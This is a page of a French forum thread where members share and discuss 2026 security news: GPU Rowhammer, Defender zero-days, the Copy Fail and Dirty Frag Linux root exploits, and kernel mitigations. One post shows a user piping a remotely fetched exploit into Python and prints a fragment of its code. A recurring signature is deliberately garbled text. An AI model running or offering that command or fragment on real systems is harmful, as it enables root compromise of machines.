Sécurité info - Page 80

2370

2026-04-14 at 06:11pm

GPUBreach Contourne L’IOMMU : Une Faille Rowhammer Sur GDDR6 NVIDIA Permet L’escalade RootPause HardwareGPUBreach : attaque Rowhammer sur GDDR6 NVIDIA qui contourne l’IOMMU, révélée à NVIDIA et hyperscalers en 11/2025. Risque d’escalade root.

Un nouveau cap est franchi dans les attaques matérielles : après avoir montré qu’un GPU pouvait sortir de son sandbox, des chercheurs démontrent désormais qu’il peut contourner l’IOMMU et manipuler directement le noyau. Avec GPUBreach, la mémoire GDDR6 devient un point d’entrée vers un accès root côté CPU.

Développée par des chercheurs de l’Université de Toronto, l’attaque GPUBreach s’appuie sur des bit flips de type Rowhammer dans la GDDR6. Jusqu’ici, ce type de faille permettait surtout de perturber la mémoire GPU ou de contourner certaines isolations.

Ici, le mécanisme va plus loin. L’attaque cible des buffers mémoire pourtant validés par le système. En corrompant les métadonnées contenues dans ces buffers, GPUBreach pousse le pilote GPU (exécuté avec des privilèges noyau) à effectuer des écritures hors des zones autorisées.

Autrement dit, ce n’est plus le GPU qui sort de son périmètre : c’est le noyau lui-même qui exécute des opérations malveillantes en toute confiance.

— Zeroblog —

« Tout homme porte sur l'épaule gauche un singe et, sur l'épaule droite, un perroquet. » — Jean Cocteau
« Moi je cherche plus de logique non plus. C'est surement pour cela que j'apprécie les Ataris, ils sont aussi logiques que moi ! » — GT Turbo

2371

2026-04-14 at 09:57pm

Il fallait s'en douter

<<< Kernel Extremis©®™ >>> et Inventeur de la différence administratif/judiciaire ! (©Yoshi Noir)

<Vertyos> un poil plus mais elle suce bien quand même la mienne ^^
<Sabrina`> tinkiete flan c juste qu'ils sont jaloux que je te trouve aussi appétissant

2372

2026-04-14 at 11:02pm

Tu as raison, d'autant que des attaques locales réalisées à bande passante élevée sont plus faciles que des Rowhammer à distance avec les NICs haut débit.

Bon, après, encore faut-il exécuter du code / manipuler des données untrusted sur le GPU.
... Comment ? Pourquoi ces ricanements dans le fond de la salle ?

Membre de la TI-Chess Team.
Co-mainteneur de GCC4TI (documentation en ligne de GCC4TI), TIEmu et TILP.
Co-admin de TI-Planet.

2373

2026-04-14 at 11:17pm

Promis, c'est pas moi !

— Zeroblog —

« Tout homme porte sur l'épaule gauche un singe et, sur l'épaule droite, un perroquet. » — Jean Cocteau
« Moi je cherche plus de logique non plus. C'est surement pour cela que j'apprécie les Ataris, ils sont aussi logiques que moi ! » — GT Turbo

2374

2026-04-15 at 01:01am

Ouch ca fait mal

Proud to be CAKE©®™

GCC4TI importe qui a problème en Autriche, pour l'UE plus et une encore de correspours nucléaire, ce n'est pas ytre d'instérier. L'état très même contraire, toujours reconstruire un pouvoir une choyer d'aucrée de compris le plus mite de genre, ce n'est pas moins)
Stalin est l'élection de la langie.

2375

2026-04-15 at 11:26am

Quand nVidia fera une nouvelle série pour résoudre ce problème, ptet que les boîtes d'IA vont pouvoir revendre tous ces GPUs et les gamers recommencer à fabriquer des PCs ?

Highway Runners, mon jeu de racing à la Outrun qu'il est sorti le 14 décembre 2016 ! N'hésitez pas à me soutenir :)

https://itunes.apple.com/us/app/highway-runners/id964932741

2376

2026-04-15 at 11:56am

Qui sait

— Zeroblog —

« Tout homme porte sur l'épaule gauche un singe et, sur l'épaule droite, un perroquet. » — Jean Cocteau
« Moi je cherche plus de logique non plus. C'est surement pour cela que j'apprécie les Ataris, ils sont aussi logiques que moi ! » — GT Turbo

2377

2026-04-19 at 01:39pm

WordPress plugin suite hacked to push malware to thousands of sitesBleepingComputerMore than 30 WordPress plugins in the EssentialPlugin package have been compromised with malicious code that allows unauthorized access to websites running them.

Further investigation by Ginder revealed that a backdoor had been present in all plugins within the EssentialPlugin package since August 2025, after the project was acquired in a six-figure deal by a new owner.

— Zeroblog —

« Tout homme porte sur l'épaule gauche un singe et, sur l'épaule droite, un perroquet. » — Jean Cocteau
« Moi je cherche plus de logique non plus. C'est surement pour cela que j'apprécie les Ataris, ils sont aussi logiques que moi ! » — GT Turbo

2378

2026-04-19 at 02:25pm

Suite du ./2366 :

New Microsoft Defender “RedSun” zero-day PoC grants SYSTEM privilegesBleepingComputerA researcher known as "Chaotic Eclipse" has published a proof-of-concept exploit for a second Microsoft Defender zero-day, dubbed "RedSun," in the past two weeks, protesting how the company works with cybersecurity researchers.

— Zeroblog —

« Tout homme porte sur l'épaule gauche un singe et, sur l'épaule droite, un perroquet. » — Jean Cocteau
« Moi je cherche plus de logique non plus. C'est surement pour cela que j'apprécie les Ataris, ils sont aussi logiques que moi ! » — GT Turbo

2379

2026-04-19 at 02:30pm

Le même auteur a apparemment un troisième exploit: https://thehackernews.com/2026/04/three-microsoft-defender-zero-days.html .

Membre de la TI-Chess Team.
Co-mainteneur de GCC4TI (documentation en ligne de GCC4TI), TIEmu et TILP.
Co-admin de TI-Planet.

2380

2026-04-19 at 03:07pm

Oui, et il a l'air remonté contre MS.

— Zeroblog —

« Tout homme porte sur l'épaule gauche un singe et, sur l'épaule droite, un perroquet. » — Jean Cocteau
« Moi je cherche plus de logique non plus. C'est surement pour cela que j'apprécie les Ataris, ils sont aussi logiques que moi ! » — GT Turbo

2381

2026-04-30 at 06:03pm

Copy Fail — 732 Bytes to RootXintCVE-2026-31431. 100% Reliable Linux LPE — no race, no per-distro offsets, page-cache write that bypasses on-disk file-integrity tools and crosses containers. Found by Xint Code.

Maigre consolation pour Flan : l'exploit est écrit en Python

— Zeroblog —

« Tout homme porte sur l'épaule gauche un singe et, sur l'épaule droite, un perroquet. » — Jean Cocteau
« Moi je cherche plus de logique non plus. C'est surement pour cela que j'apprécie les Ataris, ils sont aussi logiques que moi ! » — GT Turbo

2382

2026-05-01 at 11:11am

Il y a beaucoup de CVE trouvées ces temps-ci, on sent le passage à l'IA ^^

<<< Kernel Extremis©®™ >>> et Inventeur de la différence administratif/judiciaire ! (©Yoshi Noir)

<Vertyos> un poil plus mais elle suce bien quand même la mienne ^^
<Sabrina`> tinkiete flan c juste qu'ils sont jaloux que je te trouve aussi appétissant

2383

2026-05-01 at 12:31pm

Ouais. Il n'y a pas si longtemps, les LLMs produisaient trop de faux positifs et les humains se plaignaient de devoir perdre du temps à examiner le slop; c'est moins vrai maintenant, le flot de vulnérabilités de sévérité significative s'ouvre et le transitoire est un mauvais moment à passer pour les défenseurs et sysadmins

Membre de la TI-Chess Team.
Co-mainteneur de GCC4TI (documentation en ligne de GCC4TI), TIEmu et TILP.
Co-admin de TI-Planet.

2384

2026-05-01 at 12:55pm

Pour les chercheurs également

ils vont être complètement remplacés en quelques mois.

<<< Kernel Extremis©®™ >>> et Inventeur de la différence administratif/judiciaire ! (©Yoshi Noir)

<Vertyos> un poil plus mais elle suce bien quand même la mienne ^^
<Sabrina`> tinkiete flan c juste qu'ils sont jaloux que je te trouve aussi appétissant

2385

2026-05-01 at 02:01pm

Remplacés jusqu'à un certain point pour la découverte et l'exploitation, tu as raison. Pour les trucs suffisamment avancés, même si je sais que les LLMs disposent parfois d'un peu de créativité, GPZ, Qualys et quelques autres ne seront pas au chômage du jour au lendemain, je l'espère bien pour eux et pour tout le monde

La sécurisation d'une base de code restera limitée par ce que les mainteneurs veulent bien accepter. Si certains mainteneurs - pas au hasard, Linus Torvalds et ses principaux copains, dont Kees Cook - continuent à ne pas prendre la sécurité au sérieux, à se focaliser sur le whack-a-mole vulnérabilité par vulnérabilité, et sur des choses qui ne s'appliqueront qu'à long terme dans de futurs kernels et/ou de futurs processeurs, plutôt que d'appliquer des solutions d'anti-exploitation pragmatiques, éprouvées et améliorées constamment depuis plus de 20 ans maintenant par des gens beaucoup plus compétents qu'eux, eh bien les logiciels dont ils sont des mainteneurs continueront à être des passoires...

Membre de la TI-Chess Team.
Co-mainteneur de GCC4TI (documentation en ligne de GCC4TI), TIEmu et TILP.
Co-admin de TI-Planet.

2386

2026-05-03 at 09:38am

Mouhahaha.

$ curl https://copy.fail/exp | python3 && su
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731   0   731   0     0  3617     0  --:--:-- --:--:-- --:--:--  4153
Traceback (most recent call last):
  File "<stdin>", line 8, in <module>
FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'

Ne pas utiliseer SystemD bloque le truc, et meme en corigeant le script python, non mon serveur n'est apriori pas sensible:

$ python3 copyfail.py 
Traceback (most recent call last):
  File "/home/godzil/copyfail.py", line 9, in <module>
    while i<len(e):c(f,i,e[i:i+4]);i+=4
                   ^^^^^^^^^^^^^^^
  File "/home/godzil/copyfail.py", line 5, in c
    a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
      ^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/socket.py", line 233, in __init__
    _socket.socket.__init__(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol

Ceci dit il est probablement temps de mettre a jour le kernel.

Proud to be CAKE©®™

GCC4TI importe qui a problème en Autriche, pour l'UE plus et une encore de correspours nucléaire, ce n'est pas ytre d'instérier. L'état très même contraire, toujours reconstruire un pouvoir une choyer d'aucrée de compris le plus mite de genre, ce n'est pas moins)
Stalin est l'élection de la langie.

2387

2026-05-03 at 09:48amEdited by Lionel Debroux On the 2026-05-03 at 10:35am

J'ai lu sur LWN, je crois, que le problème est plus large que l'exploit qui cible su (parmi les logiciels setuid root); on peut aussi corrompre la copie page cache de /etc/passwd et /etc/shadow. Ne pas utiliser systemd ne protège en rien, désolé

En revanche, le fait d'avoir désactivé l'option de config kernel adéquate, qui fait alors que le kernel ne sait pas ce que AF_ALG est, est la bonne réduction du risque. On ne peut pas exploiter du code qui n'est pas présent, même sous forme de modules. Ces sockets sont utilisés par peu de programmes user-space, mais BlueZ et iwd sont moyennement largement utilisés...

Dans le thread de

https://seclists.org/oss-sec/2026/q2/seclists.org

à propos de CopyFail, Eric Biggers, le mainteneur de l'API crypto moderne du kernel (qui succède à l'API AF_ALG où il y a régulièrement des problèmes de sécurité), détaille à quel point il n'est pas fan d'AF_ALG et de son utilisation par peu de programmes.

Membre de la TI-Chess Team.
Co-mainteneur de GCC4TI (documentation en ligne de GCC4TI), TIEmu et TILP.
Co-admin de TI-Planet.

2388

2026-05-03 at 10:09am

C'est a vrai dire une utilistion (et un abus) assez peu orthodox de la pile reseau.

(quand a SD c'était une blague, mais a vrai dire ne pas l'utiliser de nos jours reduit certains vecteurs d'attaques)

Proud to be CAKE©®™

GCC4TI importe qui a problème en Autriche, pour l'UE plus et une encore de correspours nucléaire, ce n'est pas ytre d'instérier. L'état très même contraire, toujours reconstruire un pouvoir une choyer d'aucrée de compris le plus mite de genre, ce n'est pas moins)
Stalin est l'élection de la langie.

2389

2026-05-03 at 09:49pm

Lionel Debroux (./2387) :
Dans le thread de
https://seclists.org/oss-sec/2026/q2/seclists.org
à propos de CopyFail, Eric Biggers, le mainteneur de l'API crypto moderne du kernel (qui succède à l'API AF_ALG où il y a régulièrement des problèmes de sécurité), détaille à quel point il n'est pas fan d'AF_ALG et de son utilisation par peu de programmes.

J'imagine que tu parles de ce message et des suivants :

https://seclists.org/oss-sec/2026/q2/347
The problem here is specifically AF_ALG, which is an additional legacy interface that's built on top of the kernel's crypto code. For some reason it exposes basically everything to unprivileged userspace programs, and in a bug-prone way as well (e.g., zero-copy support).

If you disable AF_ALG in your kernel, then IPsec, WireGuard, and any other kernel feature that uses cryptography will still work.

What it does break are a small set of userspace programs that made the shortsighted decision to use AF_ALG, instead of simply following the standard practice of using a userspace crypto library.

Je reconnais que je ne connais pas le contexte, mais je trouve la dernière phrase assez déplacée. À partir du moment où une feature est officielle, on ne peut pas reprocher aux programmes utilisateurs de s'en servir, même si rétrospectivement on aurait préféré qu'ils ne le fassent pas. Surtout que la logique ici est bizarre : pourquoi auraient-ils dû utiliser une lib tierce pour faire la même chose qu'une feature built-in ?

— Zeroblog —

« Tout homme porte sur l'épaule gauche un singe et, sur l'épaule droite, un perroquet. » — Jean Cocteau
« Moi je cherche plus de logique non plus. C'est surement pour cela que j'apprécie les Ataris, ils sont aussi logiques que moi ! » — GT Turbo

2390

2026-05-04 at 10:47am

Pour moi la logiques est plus bizzare. Pourquoi le kernel c'est soudaiment mis proposer ca alors que tout ce qui touche a crypto devrait etre au niveau utilisateur, on peux facilement mettre a jour une lib, pas le kernel.

Proud to be CAKE©®™

GCC4TI importe qui a problème en Autriche, pour l'UE plus et une encore de correspours nucléaire, ce n'est pas ytre d'instérier. L'état très même contraire, toujours reconstruire un pouvoir une choyer d'aucrée de compris le plus mite de genre, ce n'est pas moins)
Stalin est l'élection de la langie.

2391

2026-05-04 at 12:28pm

Je dis peut-être n'importe quoi, je suis pas expert là dessus, mais il me semble que ça pourrait être utile pour la sécurisation bas niveau comme le TPM ou le chiffrement de disque.

2392

2026-05-04 at 09:45pm

C'est expliqué dans l'un des posts : c'était prévu pour supporter l'accélération matérielle de la crypto.

— Zeroblog —

« Tout homme porte sur l'épaule gauche un singe et, sur l'épaule droite, un perroquet. » — Jean Cocteau
« Moi je cherche plus de logique non plus. C'est surement pour cela que j'apprécie les Ataris, ils sont aussi logiques que moi ! » — GT Turbo

2393

2026-05-04 at 10:15pm

Accélération matérielle de la crypto qui, en pratique, est loin d'être toujours une accélération, à cause notamment de la latence des transitions user space -> kernel -> user space, la latence du matériel accélérateur lui-même, etc.

Membre de la TI-Chess Team.
Co-mainteneur de GCC4TI (documentation en ligne de GCC4TI), TIEmu et TILP.
Co-admin de TI-Planet.

2394

2026-05-04 at 11:57pm

https://xcancel.com/IntCyberDigest/status/2051406295828250963
❗️🚨 Microsoft Edge keeps every saved password in process memory as cleartext from the moment it launches. Microsoft's responsed when reported: "by design."

All of them. Including credentials for sites you won't open this session.

Researcher @L1v1ng0ffTh3L4N tested every major Chromium browser. Edge is the only one that behaves this way.

Chrome decrypts credentials on demand, and App-Bound Encryption locks the keys to an authenticated Chrome process so other processes can't reuse them.

In Chrome, plaintext surfaces only during autofill or when a password is viewed, making memory scraping far less useful.

What makes this extra weird is that Edge still demands re-authentication before revealing those passwords in its Password Manager UI, while the same browser process already holds every one of them in plaintext.

In shared environments, this turns into a credential harvest. On a terminal server, an attacker with admin rights can read the memory of every logged-on user process. In the published PoC video, a compromised admin account lifts stored credentials from two other logged-on (and even disconnected) users with Edge running.

Microsoft's official response when notified: "by design."

The finding was disclosed April 29 at BigBiteOfTech by PaloAltoNtwks Norway, alongside a small educational tool that lets anyone verify the cleartext storage for themselves.

— Zeroblog —

« Tout homme porte sur l'épaule gauche un singe et, sur l'épaule droite, un perroquet. » — Jean Cocteau
« Moi je cherche plus de logique non plus. C'est surement pour cela que j'apprécie les Ataris, ils sont aussi logiques que moi ! » — GT Turbo

2395

2026-05-06 at 09:31pm

Ceci dit, récupérer les mots de passe de Chrome n'est apparemment pas très difficile non plus : https://xcancel.com/UK_Daniel_Card/status/2052009341742436418

— Zeroblog —

« Tout homme porte sur l'épaule gauche un singe et, sur l'épaule droite, un perroquet. » — Jean Cocteau
« Moi je cherche plus de logique non plus. C'est surement pour cela que j'apprécie les Ataris, ils sont aussi logiques que moi ! » — GT Turbo

2396

2026-05-06 at 10:03pm

Pas terrible, tout ça

<<< Kernel Extremis©®™ >>> et Inventeur de la différence administratif/judiciaire ! (©Yoshi Noir)

<Vertyos> un poil plus mais elle suce bien quand même la mienne ^^
<Sabrina`> tinkiete flan c juste qu'ils sont jaloux que je te trouve aussi appétissant

2397

2026-05-08 at 10:31am

Rebelote... :

GitHub - V4bel/dirtyfragGitHubContribute to V4bel/dirtyfrag development by creating an account on GitHub.

This document describes the Dirty Frag vulnerability class, first discovered and reported by Hyunwoo Kim (@v4bel), which can obtain root privileges on major Linux distributions by chaining the xfrm-ESP Page-Cache Write vulnerability and the RxRPC Page-Cache Write vulnerability.

Dirty Frag is a case that extends the bug class to which Dirty Pipe and Copy Fail belong. Because it is a deterministic logic bug that does not depend on a timing window, no race condition is required, the kernel does not panic when the exploit fails, and the success rate is very high.

For detailed technical information and the timeline, see here.

Because the embargo has currently been broken, no patch or CVE exists. After consultation with the maintainers on linux-distros@vs.openwall.org and at their request, this Dirty Frag document is being published. For the disclosure timeline, refer to the technical details.

— Zeroblog —

« Tout homme porte sur l'épaule gauche un singe et, sur l'épaule droite, un perroquet. » — Jean Cocteau
« Moi je cherche plus de logique non plus. C'est surement pour cela que j'apprécie les Ataris, ils sont aussi logiques que moi ! » — GT Turbo

2398

2026-05-08 at 12:12pm

Et certainement d'autres à venir dans un futur proche, vu qu'il y a beaucoup de recherches de vulnérabilités et de production d'exploits sur ce sujet précis ces temps-ci... peut-être même que certaines vulnérabilités de la même classe sont déjà en cours de traitement en privé

Contrairement à celle de Copy Fail, la mitigation de Dirty Frag à base de modprobe, sur les machines où ces modules ne sont pas utilisés par un logiciel légitime, fonctionne sur la grande majorité des distros. C'est bête que les distros enterprise (TM) aient trouvé malin de compiler algif_aead en dur dans le kernel.
D'après ce que j'ai lu, l'exploit fourni pour Dirty Frag utilise les unprivileged user namespaces, une énorme passoire (historiquement, des dizaines de LPE, et encore des facilitations d'exploit comme ici) que je désactive depuis des années sur toutes les machines perso et pro. Mais ça ne veut pas nécessairement dire qu'on ne peut pas faire un autre exploit qui n'utiliserait pas ça...

Comme souvent, grsecurity comporte une fonctionnalité - ici MODHARDEN - qui, quand elle est activée, limite l'auto-loading de modules causé par la demande d'ouverture de socket d'un type donné par un utilisateur non privilégié, et donc, aide à se défendre des vulnérabilités dont il est question ici, si elles sont présentes sous forme de module et non built-in.

Membre de la TI-Chess Team.
Co-mainteneur de GCC4TI (documentation en ligne de GCC4TI), TIEmu et TILP.
Co-admin de TI-Planet.

2399

2026-05-11 at 09:44am

Pour alléger un peu l'ambiance tendue de ces derniers temps :

Incident Report: CVE-2024-YIKESAndrew NesbittA series of unfortunate events.

— Zeroblog —

« Tout homme porte sur l'épaule gauche un singe et, sur l'épaule droite, un perroquet. » — Jean Cocteau
« Moi je cherche plus de logique non plus. C'est surement pour cela que j'apprécie les Ataris, ils sont aussi logiques que moi ! » — GT Turbo

2400

2026-05-13 at 10:25pm

Il y avait eu un variant de Dirty Frag... eh bien en voici un deuxième, nommé Fragnesia. Même mitigation que les deux autres, patch supplémentaire en cours de répercussion dans les kernels stables, et par les distros.

Membre de la TI-Chess Team.
Co-mainteneur de GCC4TI (documentation en ligne de GCC4TI), TIEmu et TILP.
Co-admin de TI-Planet.